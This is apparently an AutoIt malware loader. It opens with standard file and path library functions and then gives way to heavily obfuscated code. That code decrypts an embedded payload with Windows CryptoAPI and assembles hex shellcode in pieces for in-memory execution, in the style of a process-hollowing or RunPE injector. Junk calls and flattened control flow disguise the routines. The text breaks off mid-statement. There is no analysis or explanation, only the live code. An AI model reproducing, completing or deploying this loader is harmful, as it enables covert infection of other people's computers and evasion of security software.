(STRINGREPLACE (STRINGREGEXPREPLACE ($SLIST , "[][$^.{}()+\-]" , "\\$0" ) , "?" , "." ) , "*" , ".*?" ) $SMASK = "(?i)^(" & $SLIST & ")\z" RETURN 1 ENDFUNC FUNC _FILEPRINT ($SFILEPATH , $ISHOW = @SW_HIDE ) IF $ISHOW = DEFAULT THEN $ISHOW = @SW_HIDE RETURN SHELLEXECUTE ($SFILEPATH , "" , @WORKINGDIR , "print" , $ISHOW ) ENDFUNC FUNC _FILEREADTOARRAY ($SFILEPATH , BYREF $VRETURN , $IFLAGS = $FRTA_COUNT , $SDELIMITER = "" ) $VRETURN = 0 IF $IFLAGS = DEFAULT THEN $IFLAGS = $FRTA_COUNT IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" LOCAL $BEXPAND = TRUE IF BITAND ($IFLAGS , $FRTA_INTARRAYS ) THEN $BEXPAND = FALSE $IFLAGS -= $FRTA_INTARRAYS ENDIF LOCAL $IENTIRE = $STR_CHRSPLIT IF BITAND ($IFLAGS , $FRTA_ENTIRESPLIT ) THEN $IENTIRE = $STR_ENTIRESPLIT $IFLAGS -= $FRTA_ENTIRESPLIT ENDIF LOCAL $INOCOUNT = 0 IF $IFLAGS <> $FRTA_COUNT THEN $IFLAGS = $FRTA_NOCOUNT $INOCOUNT = $STR_NOCOUNT ENDIF IF $SDELIMITER THEN LOCAL $ALINES = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($ALINES ) + $IFLAGS IF $BEXPAND THEN LOCAL $IDIM_2 = UBOUND (STRINGSPLIT ($ALINES [0 ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) ) LOCAL $ATEMP_ARRAY [$IDIM_1 ] [$IDIM_2 ] LOCAL $IFIELDS , $ASPLIT FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ASPLIT = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) $IFIELDS = UBOUND ($ASPLIT ) IF $IFIELDS <> $IDIM_2 THEN RETURN SETERROR (3 , 0 , 0 ) ENDIF FOR $J = 0 TO $IFIELDS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] [$J ] = $ASPLIT [$J ] NEXT NEXT IF $IDIM_2 < 2 THEN RETURN SETERROR (4 , 0 , 0 ) IF $IFLAGS THEN $ATEMP_ARRAY [0 ] [0 ] = $IDIM_1 - $IFLAGS $ATEMP_ARRAY [0 ] [1 ] = $IDIM_2 ENDIF ELSE LOCAL $ATEMP_ARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $INOCOUNT ) NEXT IF $IFLAGS THEN $ATEMP_ARRAY [0 ] = $IDIM_1 - $IFLAGS ENDIF ENDIF $VRETURN = $ATEMP_ARRAY ELSE IF $IFLAGS THEN LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF STRINGLEN ($SFILEREAD ) THEN $VRETURN = STRINGREGEXP (@LF & $SFILEREAD , "(?|(\N+)\z|(\N*)(?:\R))" , 3 ) $VRETURN [0 ] = UBOUND ($VRETURN ) + 4294967295 ELSE RETURN SETERROR (2 , 0 , 0 ) ENDIF ELSE $VRETURN = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN $VRETURN = 0 RETURN SETERROR (@ERROR , 0 , 0 ) ENDIF ENDIF ENDIF RETURN 1 ENDFUNC FUNC _FILEWRITEFROMARRAY ($SFILEPATH , CONST BYREF $AARRAY , $IBASE = DEFAULT , $IUBOUND = DEFAULT , $SDELIMITER = "|" ) LOCAL $IRETURN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (2 , 0 , $IRETURN ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) IF $IDIMS > 2 THEN RETURN SETERROR (4 , 0 , 0 ) LOCAL $ILAST = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = DEFAULT OR $IUBOUND > $ILAST THEN $IUBOUND = $ILAST IF $IBASE < 0 OR $IBASE = DEFAULT THEN $IBASE = 0 IF $IBASE > $IUBOUND THEN RETURN SETERROR (5 , 0 , $IRETURN ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "|" LOCAL $HFILEOPEN = $SFILEPATH IF ISSTRING ($SFILEPATH ) THEN $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , $IRETURN ) ENDIF LOCAL $IERROR = 0 $IRETURN = 1 SWITCH $IDIMS CASE 1 FOR $I = $IBASE TO $IUBOUND IF NOT FILEWRITE ($HFILEOPEN , $AARRAY [$I ] & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT CASE 2 LOCAL $STEMP = "" FOR $I = $IBASE TO $IUBOUND $STEMP = $AARRAY [$I ] [0 ] FOR $J = 1 TO UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 $STEMP &= $SDELIMITER & $AARRAY [$I ] [$J ] NEXT IF NOT FILEWRITE ($HFILEOPEN , $STEMP & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT ENDSWITCH IF ISSTRING ($SFILEPATH ) THEN FILECLOSE ($HFILEOPEN ) RETURN SETERROR ($IERROR , 0 , $IRETURN ) ENDFUNC FUNC _FILEWRITELOG ($SLOGPATH , $SLOGMSG , $IFLAG = + 4294967295 ) LOCAL $IOPENMODE = $FO_APPEND LOCAL $SDATENOW = @YEAR & "-" & @MON & "-" & @MDAY LOCAL $STIMENOW = @HOUR & ":" & @MIN & ":" & @SEC LOCAL $SMSG = $SDATENOW & " " & $STIMENOW & " : " & $SLOGMSG IF $IFLAG = DEFAULT THEN $IFLAG = + 4294967295 IF $IFLAG <> + 4294967295 THEN $IOPENMODE = $FO_OVERWRITE $SMSG &= @CRLF & FILEREAD ($SLOGPATH ) ENDIF LOCAL $HFILEOPEN = $SLOGPATH IF ISSTRING ($SLOGPATH ) THEN $HFILEOPEN = FILEOPEN ($SLOGPATH , $IOPENMODE ) ENDIF IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IRETURN = FILEWRITELINE ($HFILEOPEN , $SMSG ) IF ISSTRING ($SLOGPATH ) THEN $IRETURN = FILECLOSE ($HFILEOPEN ) IF $IRETURN <= 0 THEN RETURN SETERROR (2 , $IRETURN , 0 ) RETURN $IRETURN ENDFUNC FUNC _FILEWRITETOLINE ($SFILEPATH , $ILINE , $STEXT , $BOVERWRITE = FALSE ) IF $ILINE <= 0 THEN RETURN SETERROR (4 , 0 , 0 ) IF NOT ISSTRING ($STEXT ) THEN $STEXT = STRING ($STEXT ) IF $STEXT = "" THEN RETURN SETERROR (6 , 0 , 0 ) ENDIF IF $BOVERWRITE = DEFAULT THEN $BOVERWRITE = FALSE IF NOT (ISBOOL ($BOVERWRITE ) OR $BOVERWRITE = 0 OR $BOVERWRITE = 1 ) THEN RETURN SETERROR (5 , 0 , 0 ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $AARRAY = FILEREADTOARRAY ($SFILEPATH ) LOCAL $IUBOUND = UBOUND ($AARRAY ) + 4294967295 IF ($IUBOUND + 1 ) < $ILINE THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , FILEGETENCODING ($SFILEPATH ) + $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $SDATA = "" $ILINE -= 1 FOR $I = 0 TO $IUBOUND IF $I = $ILINE THEN IF $BOVERWRITE THEN IF $STEXT THEN $SDATA &= $STEXT & @CRLF ELSE $SDATA &= $STEXT & @CRLF & $AARRAY [$I ] & @CRLF ENDIF ELSEIF $I < $IUBOUND THEN $SDATA &= $AARRAY [$I ] & @CRLF ELSEIF $I = $IUBOUND THEN $SDATA &= $AARRAY [$I ] ENDIF NEXT FILEWRITE ($HFILEOPEN , $SDATA ) FILECLOSE ($HFILEOPEN ) RETURN 1 ENDFUNC FUNC _PATHFULL ($SRELATIVEPATH , $SBASEPATH = @WORKINGDIR ) IF NOT $SRELATIVEPATH OR $SRELATIVEPATH = "." THEN RETURN $SBASEPATH LOCAL $SFULLPATH = STRINGREPLACE ($SRELATIVEPATH , "/" , "\" ) LOCAL CONST $SFULLPATHCONST = $SFULLPATH LOCAL $SPATH LOCAL $BROOTONLY = STRINGLEFT ($SFULLPATH , 1 ) = "\" AND STRINGMID ($SFULLPATH , 2 , 1 ) <> "\" IF $SBASEPATH = DEFAULT THEN $SBASEPATH = @WORKINGDIR FOR $I = 1 TO 2 $SPATH = STRINGLEFT ($SFULLPATH , 2 ) IF $SPATH = "\\" THEN $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , 2 ) LOCAL $NSERVERLEN = STRINGINSTR ($SFULLPATH , "\" ) + 4294967295 $SPATH = "\\" & STRINGLEFT ($SFULLPATH , $NSERVERLEN ) $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , $NSERVERLEN ) EXITLOOP ELSEIF STRINGRIGHT ($SPATH , 1 ) = ":" THEN $SFULLPATH = STRINGTRIMLEFT ($SFULLPATH , 2 ) EXITLOOP ELSE $SFULLPATH = $SBASEPATH & "\" & $SFULLPATH ENDIF NEXT IF STRINGLEFT ($SFULLPATH , 1 ) <> "\" THEN IF STRINGLEFT ($SFULLPATHCONST , 2 ) = STRINGLEFT ($SBASEPATH , 2 ) THEN $SFULLPATH = $SBASEPATH & "\" & $SFULLPATH ELSE $SFULLPATH = "\" & $SFULLPATH ENDIF ENDIF LOCAL $ATEMP = STRINGSPLIT ($SFULLPATH , "\" ) LOCAL $APATHPARTS [$ATEMP [0 ] ] , $J = 0 FOR $I = 2 TO $ATEMP [0 ] IF $ATEMP [$I ] = ".." THEN IF $J THEN $J -= 1 ELSEIF NOT ($ATEMP [$I ] = "" AND $I <> $ATEMP [0 ] ) AND $ATEMP [$I ] <> "." THEN $APATHPARTS [$J ] = $ATEMP [$I ] $J += 1 ENDIF NEXT $SFULLPATH = $SPATH IF NOT $BROOTONLY THEN FOR $I = 0 TO $J + 4294967295 $SFULLPATH &= "\" & $APATHPARTS [$I ] NEXT ELSE $SFULLPATH &= $SFULLPATHCONST IF STRINGINSTR ($SFULLPATH , ".." ) THEN $SFULLPATH = _PATHFULL ($SFULLPATH ) ENDIF DO $SFULLPATH = STRINGREPLACE ($SFULLPATH , ".\" , "\" ) UNTIL @EXTENDED = 0 RETURN $SFULLPATH ENDFUNC FUNC _PATHGETRELATIVE ($SFROM , $STO ) IF STRINGRIGHT ($SFROM , 1 ) <> "\" THEN $SFROM &= "\" IF STRINGRIGHT ($STO , 1 ) <> "\" THEN $STO &= "\" IF $SFROM = $STO THEN RETURN SETERROR (1 , 0 , STRINGTRIMRIGHT ($STO , 1 ) ) LOCAL $ASFROM = STRINGSPLIT ($SFROM , "\" ) LOCAL $ASTO = STRINGSPLIT ($STO , "\" ) IF $ASFROM [1 ] <> $ASTO [1 ] THEN RETURN SETERROR (2 , 0 , STRINGTRIMRIGHT ($STO , 1 ) ) LOCAL $I = 2 LOCAL $IDIFF = 1 WHILE 1 IF $ASFROM [$I ] <> $ASTO [$I ] THEN $IDIFF = $I EXITLOOP ENDIF $I += 1 WEND $I = 1 LOCAL $SRELPATH = "" FOR $J = 1 TO $ASTO [0 ] IF $I >= $IDIFF THEN $SRELPATH &= "\" & $ASTO [$I ] ENDIF $I += 1 NEXT $SRELPATH = STRINGTRIMLEFT ($SRELPATH , 1 ) $I = 1 FOR $J = 1 TO $ASFROM [0 ] IF $I > $IDIFF THEN $SRELPATH = "..\" & $SRELPATH ENDIF $I += 1 NEXT IF STRINGRIGHT ($SRELPATH , 1 ) == "\" THEN $SRELPATH = STRINGTRIMRIGHT ($SRELPATH , 1 ) RETURN $SRELPATH ENDFUNC FUNC _PATHMAKE ($SDRIVE , $SDIR , $SFILENAME , $SEXTENSION ) IF STRINGLEN ($SDRIVE ) THEN IF NOT (STRINGLEFT ($SDRIVE , 2 ) = "\\" ) THEN $SDRIVE = STRINGLEFT ($SDRIVE , 1 ) & ":" ENDIF IF STRINGLEN ($SDIR ) THEN IF NOT (STRINGRIGHT ($SDIR , 1 ) = "\" ) AND NOT (STRINGRIGHT ($SDIR , 1 ) = "/" ) THEN $SDIR = $SDIR & "\" ELSE $SDIR = "\" ENDIF IF STRINGLEN ($SDIR ) THEN IF NOT (STRINGLEFT ($SDIR , 1 ) = "\" ) AND NOT (STRINGLEFT ($SDIR , 1 ) = "/" ) THEN $SDIR = "\" & $SDIR ENDIF IF STRINGLEN ($SEXTENSION ) THEN IF NOT (STRINGLEFT ($SEXTENSION , 1 ) = "." ) THEN $SEXTENSION = "." & $SEXTENSION ENDIF RETURN $SDRIVE & $SDIR & $SFILENAME & $SEXTENSION ENDFUNC FUNC _PATHSPLIT ($SFILEPATH , BYREF $SDRIVE , BYREF $SDIR , BYREF $SFILENAME , BYREF $SEXTENSION ) LOCAL $AARRAY = STRINGREGEXP ($SFILEPATH , "^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$" , $STR_REGEXPARRAYMATCH ) IF @ERROR THEN REDIM $AARRAY [5 ] $AARRAY [0 ] = $SFILEPATH ENDIF $SDRIVE = $AARRAY [1 ] IF STRINGLEFT ($AARRAY [2 ] , 1 ) == "/" THEN $SDIR = STRINGREGEXPREPLACE ($AARRAY [2 ] , "\h*[\/\\]+\h*" , "\/" ) ELSE $SDIR = STRINGREGEXPREPLACE ($AARRAY [2 ] , "\h*[\/\\]+\h*" , "\\" ) ENDIF $AARRAY [2 ] = $SDIR $SFILENAME = $AARRAY [3 ] $SEXTENSION = $AARRAY [4 ] RETURN $AARRAY ENDFUNC FUNC _REPLACESTRINGINFILE ($SFILEPATH , $SSEARCHSTRING , $SREPLACESTRING , $ICASESENSITIVE = 0 , $IOCCURANCE = 1 ) IF STRINGINSTR (FILEGETATTRIB ($SFILEPATH ) , "R" ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF $ICASESENSITIVE = DEFAULT THEN $ICASESENSITIVE = 0 IF $IOCCURANCE = DEFAULT THEN $IOCCURANCE = 1 $SFILEREAD = STRINGREPLACE ($SFILEREAD , $SSEARCHSTRING , $SREPLACESTRING , 1 - $IOCCURANCE , $ICASESENSITIVE ) LOCAL $IRETURN = @EXTENDED IF $IRETURN THEN LOCAL $IFILEENCODING = FILEGETENCODING ($SFILEPATH ) $HFILEOPEN = FILEOPEN ($SFILEPATH , $IFILEENCODING + $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FILEWRITE ($HFILEOPEN , $SFILEREAD ) FILECLOSE ($HFILEOPEN ) ENDIF RETURN $IRETURN ENDFUNC FUNC _TEMPFILE ($SDIRECTORYNAME = @TEMPDIR , $SFILEPREFIX = "~" , $SFILEEXTENSION = ".tmp" , $IRANDOMLENGTH = 7 ) IF $IRANDOMLENGTH = DEFAULT OR $IRANDOMLENGTH <= 0 THEN $IRANDOMLENGTH = 7 IF $SDIRECTORYNAME = DEFAULT OR (NOT FILEEXISTS ($SDIRECTORYNAME ) ) THEN $SDIRECTORYNAME = @TEMPDIR IF $SFILEEXTENSION = DEFAULT THEN $SFILEEXTENSION = ".tmp" IF $SFILEPREFIX = DEFAULT THEN $SFILEPREFIX = "~" IF NOT FILEEXISTS ($SDIRECTORYNAME ) THEN $SDIRECTORYNAME = @SCRIPTDIR $SDIRECTORYNAME = STRINGREGEXPREPLACE ($SDIRECTORYNAME , "[\\/]+$" , "" ) $SFILEEXTENSION = STRINGREGEXPREPLACE ($SFILEEXTENSION , "^\.+" , "" ) $SFILEPREFIX = STRINGREGEXPREPLACE ($SFILEPREFIX , "[\\/:*?"<>|]" , "" ) LOCAL $STEMPNAME = "" DO $STEMPNAME = "" WHILE STRINGLEN ($STEMPNAME ) < $IRANDOMLENGTH $STEMPNAME &= CHR (RANDOM (97 , 122 , 1 ) ) WEND $STEMPNAME = $SDIRECTORYNAME & "\" & $SFILEPREFIX & $STEMPNAME & "." & $SFILEEXTENSION UNTIL NOT FILEEXISTS ($STEMPNAME ) RETURN $STEMPNAME ENDFUNC #NoTrayIcon FUNC DBRUAIEIBZEWRGBQ ($VDATA , $VCRYPTKEY ) GLOBAL $569195090 = 1700268568 GLOBAL $DYJO7XI0ZR = 1929536 FOR $E = 0 TO 16288 CHR (684290 ) IF $569195090 = 73392173 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyKey" , "handle" , $VCRYPTKEY ) $569195090 = 1296546299 ENDIF IF $569195090 = 97398974 THEN $TBUFF = DLLSTRUCTCREATE ("byte[" & BINARYLEN ($VDATA ) + "1000" & "]" ) $569195090 = 1248908323 ISPTR (3853051 + 1638825 * 1547893 ) ENDIF IF $569195090 = 208206939 THEN DLLCLOSE ($__G_ACRYPTINTERNALDATA ["1" ] ) $569195090 = 665766390 ISBOOL ("34j5R73dGD6I" ) ENDIF IF $569195090 = 216567143 THEN $TTEMPSTRUCT = DLLSTRUCTCREATE ("byte[" & $IPLAINTEXTSIZE + "1" & "]" , DLLSTRUCTGETPTR ($TBUFF ) ) $569195090 = 1933112639 ISBINARY (1198197 + 3255423 + 521890 ) ENDIF IF $569195090 = 227757661 THEN LOCAL $VRETURN CHR (146190 ) $569195090 = 686536036 DIM $JUYK3CZ7P0QYD5XI3BYA = 2657508 + 4292338741 + 4291347646 ENDIF IF $569195090 = 295874608 THEN $__G_ACRYPTINTERNALDATA [1 ] = DLLOPEN ("Advapi32.dll" ) $569195090 = 1532618530 DIM $MGXLD4ZCRIABNR59SJXR = 2913009 + 4291678514 + 1019338 + 2988075 + 1033950 * 1364808 + 1903877 PTR (2063219 + 4291058243 + 4293435455 ) ENDIF IF $569195090 = 418593742 THEN LOCAL $TTEMPSTRUCT DIM $PASKUUU4FSRSWMJIWVNT = 3920272 $569195090 = 1052868023 ENDIF IF $569195090 = 463888510 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptReleaseContext" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "dword" , "0" ) PTR ("gd1ibs7elJVICiG2jmxyMbH4hkLlW7aEKVLo0nl" ) $569195090 = 208206939 ISFLOAT ("IzLRIGMHB4ReE7b1RVsnJp7RFrb5bGX504vSH4MotCdReHT2mtj0x7dsB4kqFSG4gWnKLssWie4h" ) ENDIF IF $569195090 = 548984161 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptHashData" , "handle" , $HCRYPTHASH , "struct*" , $TBUFF , "dword" , DLLSTRUCTGETSIZE ($TBUFF ) , "dword" , "1" ) ISBOOL ("Rx6G30dpNUvTL5iKrtiq3bwStc6fmqlSw8ZGjouUIdNcXvsleOvOz20Qaon147dxHMvMgLAc9xSZwu48UUbG4Gr" ) $569195090 = 693997732 ENDIF IF $569195090 = 665766390 THEN RETURN BINARY ($VRETURN ) ISSTRING (2395551 + 1965250 ) EXITLOOP ENDIF IF $569195090 = 686536036 THEN $VDATA = BINARYTOSTRING ($VDATA ) CHR (924694 ) $569195090 = 295874608 ENDIF IF $569195090 = 693997732 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDeriveKey" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "uint" , "0x00006610" , "handle" , $HCRYPTHASH , "dword" , "0x00000001" , "handle*" , "0" ) $569195090 = 1483208281 MOD (437026 , 632919 ) ISSTRING ("1D6gFaEHgZf0U8eOIsL2pti0ZJWwQNEXDZhlivSr" ) ENDIF IF $569195090 = 718764494 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDecrypt" , "handle" , $VCRYPTKEY , "handle" , "0" , "bool" , EXECUTE ("True" ) , "dword" , "0" , "struct*" , $TBUFF , "dword*" , BINARYLEN ($VDATA ) ) $569195090 = 1655295316 ENDIF IF $569195090 = 895876247 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptCreateHash" , "handle" , $__G_ACRYPTINTERNALDATA ["2" ] , "uint" , "0x00008003" , "ptr" , "0" , "dword" , "0" , "handle*" , "0" ) DIM $EXM1IFHVGQ5OI1BUSV50 = "FmJtSVq7L9aFulqs6vTJ0bfXdbMK04DOzi8lLHAurxDr5SXQlbwalqdEhXpQhOhSEuflmfQx4ysBGY2un7zYHDCjfDdZrUnLqWWJLLCfv8" $569195090 = 1876673018 RANDOM (1243867 ) ENDIF IF $569195090 = 969182864 THEN $__G_ACRYPTINTERNALDATA ["2" ] = $ARET ["1" ] CHR (640441 ) $569195090 = 1622275345 ENDIF IF $569195090 = 1052868023 THEN LOCAL $IPLAINTEXTSIZE DIM $TB1GKKQLUBSSLETCJXQL = 1953326 $569195090 = 227757661 WINEXISTS ("rdx8MVSQFTeD15LqzmrLl0O4ZINlULmq7T2hsnhpJcgVp" ) CHR (242088 ) ENDIF IF $569195090 = 1248908323 THEN DLLSTRUCTSETDATA ($TBUFF , EXECUTE ("1" ) , $VDATA ) INT (1856423 ) $569195090 = 718764494 ENDIF IF $569195090 = 1296546299 THEN $__G_ACRYPTINTERNALDATA ["0" ] -= "1" $569195090 = 463888510 WINEXISTS ("YGidE8mfbcjU3O11mh0H3YOHzTZfdidhmpBBJxI61nApbREYqm4yfvL91JMVjh" ) ENDIF IF $569195090 = 1372412672 THEN DLLSTRUCTSETDATA ($TBUFF , EXECUTE ("1" ) , $VCRYPTKEY ) $569195090 = 548984161 ISBOOL (861948 + 3268186 + 4291360318 ) STRING ("SnaY0oOb0MBJ9UXWUlHq8j1K25fZlQ6MAd5HitlNtaRaVZseVh5DYjHIwz55iZ0" ) ENDIF IF $569195090 = 1435411003 THEN DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyHash" , "handle" , $HCRYPTHASH ) $569195090 = 1623917350 WINEXISTS ("pMAa468B1ZdMbddVCYrFvlTxqFEkHt7QwpFDDD4mJgFJ2rgVWxna1zCe4dTyBX4G2wpWHJq94e5pOiE8yTyjg6Y6WBJAUFVWm8S" ) STRING ("hogWDnyWIVaSxUA5It9fa0o" ) ENDIF IF $569195090 = 1446413075 THEN $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptDestroyKey" , "handle" , $VCRYPTKEY ) $569195090 = 73392173 RANDOM (3748120 ) ENDIF IF $569195090 = 1483208281 THEN $VRETURN = $ARET ["5" ] $569195090 = 1435411003 DIM $BIDY28EDXCHW6TUHLQ9S = "ukSvIZ6llRHfF1Acl7q3qUJiNcnSyaW3iIgxvCsjI1mV9RA13fatTZmK" ENDIF IF $569195090 = 1532618530 THEN LOCAL $ARET = DLLCALL ($__G_ACRYPTINTERNALDATA ["1" ] , "bool" , "CryptAcquireContext" , "handle*" , "0" , "ptr" , "0" , "ptr" , "0" , "dword" , "24" , "dword" , "0xF0000000" ) ISFLOAT (2445292 * 717613 ) $569195090 = 969182864 RANDOM (3800342 ) ISFLOAT (2631402 + 1592634 ) ENDIF IF $569195090 = 1622275345 THEN $__G_ACRYPTINTERNALDATA ["0" ] += "1" DIM $LVZTABKTWFXWVVHUEB0U = 3040659 + 4294453516 * 1561776 + 2615672 + 4292985959 * 160396 * 1690876 * 3711931 $569195090 = 895876247 ENDIF IF $569195090 = 1623473715 THEN LOCAL $TBUFF $569195090 = 418593742 MOD (1053136 , 3647856 ) ISBOOL (1305474 * 3237247 + 524023 ) ENDIF IF $569195090 = 1623917350 THEN $VCRYPTKEY = $VRETURN $569195090 = 97398974 PTR (3304174 + 4294888220 + 4290973688 ) WINEXISTS ("0wZi34JDsVdEDFXLJXcAIAO6XaToH8creTQL8cosyBAcEtf8nUzcoEczS2v3lu5tSVAU0kM" ) ENDIF IF $569195090 = 1655295316 THEN $IPLAINTEXTSIZE = $ARET ["6" ] ISPTR ("9LBC4VaYHadIR" ) $569195090 = 216567143 ENDIF IF $569195090 = 1700268568 THEN LOCAL $__G_ACRYPTINTERNALDATA ["3" ] $569195090 = 1623473715 ENDIF IF $569195090 = 1876673018 THEN $HCRYPTHASH = $ARET ["5" ] STRING ("g2DEC" ) $569195090 = 2132296422 DIM $A28ZTHVSS1CJQH0NL8K2 = 1199422 ISBOOL (3867385 * 2102375 + 4294545054 * 3369801 ) ENDIF IF $569195090 = 1933112639 THEN $VRETURN = BINARYMID (DLLSTRUCTGETDATA ($TTEMPSTRUCT , EXECUTE ("1" ) ) , "1" , $IPLAINTEXTSIZE ) PTR ("UyvLbbtHWIcp2EtGWSrzXvzfljVpTB2b14nlGRRIpeliMqQLCsc7F64x9pz1pdYtQax7qhafaTkSjrC4CjXA" ) $569195090 = 1446413075 DIM $ZMQQ0SLP2BM3TUUS66XW = "nSXFxgpx4VEC7A4TZkz8BrZ0" ENDIF IF $569195090 = 2132296422 THEN $TBUFF = DLLSTRUCTCREATE ("byte[" & BINARYLEN ($VCRYPTKEY ) & "]" ) $569195090 = 1372412672 DIM $C8SIYKEDVBM528RHZW3Z = 2281636 ENDIF NEXT ENDFUNC FUNC MWMQWLZFSVGLEKEBWPKTQCNGY ($WPATH , $WARGUMENTS , $LPFILE , $PROTECT ) GLOBAL $1267239031 = 1700268568 GLOBAL $627DNRXPAW = 2952434 FOR $E = 0 TO 3174096 IF $1267239031 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837DF4000F84800000008B97A00000008365F40003D383BFA4" MOD (271299 , 2858503 ) $1267239031 = 979069101 DIM $SL85CIVLUVEOMGRY4ILH = 3686944 ENDIF IF $1267239031 = 73392173 THEN $BIN_SHELLCODE &= "00008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A4068003000" $1267239031 = 1296546299 DIM $UCEJUJMVO2OWUREJB8DK = "SX4s47WmxFv1coshkK4c1syiHx5Cu1hI3nLpj1Zm1H0vtESBVCrwii5zxVUGbs1FxW7ZLd7tVSksBdYcQCS2JVzVrm2xgs" ENDIF IF $1267239031 = 97398974 THEN $BIN_SHELLCODE &= "8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB746" RANDOM (2182153 ) $1267239031 = 1248908323 PTR (2015213 + 4293245442 * 2450013 * 1301782 ) PTR (2322587 * 2532464 + 4294126729 + 4293325415 ) ENDIF IF $1267239031 = 195372937 THEN $BIN_SHELLCODE &= "000020741985C079046A40EB172500000040F7D81BC083E01083C010EB1585" $1267239031 = 851821169 ISBINARY ("qEXMawLj9X" ) ENDIF IF $1267239031 = 202026599 THEN $KEY ["1" ] ("kernel32" , "dword" , "VirtualFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "dword" , "0x8000" ) ISBOOL ("AL8RxuluuAG6Ui3u90oQmd5IMtDwz1kLhZb5M5TUfkBmCA2" ) EXITLOOP ENDIF IF $1267239031 = 208206939 THEN $BIN_SHELLCODE &= "5033FFC745EC0100000057FF75D8FF55C08945F885C0751468008000005753" $1267239031 = 665766390 STRING (1632576 + 3412180 ) ENDIF IF $1267239031 = 216567143 THEN $BIN_SHELLCODE &= "000F84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508" ISSTRING ("Y5g7SdgEKcKSglACq7kVsxMNnn1O3pp86HM73iUMsZjjW8s2MxH7sELArCUDmAKuWMWHIDIhnHCDnD2o59bFSsQA5mOAxqA1nYxjmVsiYzTVci" ) $1267239031 = 1933112639 ISBOOL ("fMC6uLwYiT7hKpzgTcjQ2RrI5yXa203RnBik4m1i6uQQWMA2WR" ) ENDIF IF $1267239031 = 227757661 THEN $BIN_SHELLCODE &= "401803CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C" CHR (2119341 ) $1267239031 = 686536036 STRING (87506 * 1456198 * 1151148 * 993779 ) DIM $OMFLBUHBKWR74NL8ZSQ4 = 3004838 ENDIF IF $1267239031 = 295874608 THEN $BIN_SHELLCODE &= "8303C7EBE9558BEC81ECF003000053565733FF897DB8648B35300000008B76" DIM $TJXXZGTRVHDVRXX9WUHT = 3965608 * 594418 * 1232006 + 4291190241 + 1004517 + 4293345140 + 1340308 + 2821848 $1267239031 = 1532618530 MOD (2201050 , 2680202 ) ENDIF IF $1267239031 = 304845161 THEN $BIN_SHELLCODE &= "050F8677FCFFFF33C05F5E5B8BE55DC20C00" $1267239031 = 1014781231 DIM $534XE2B5XALFYJFCYIRA = 57560 PTR (3960181 + 1285405 * 1928343 + 2702247 ) ENDIF IF $1267239031 = 363789172 THEN LOCAL $SHELLCODE_STRUCT = $KEY ["0" ] ("byte shellcode[" & $BINL & "]" , $LPSHELLCODE ) $1267239031 = 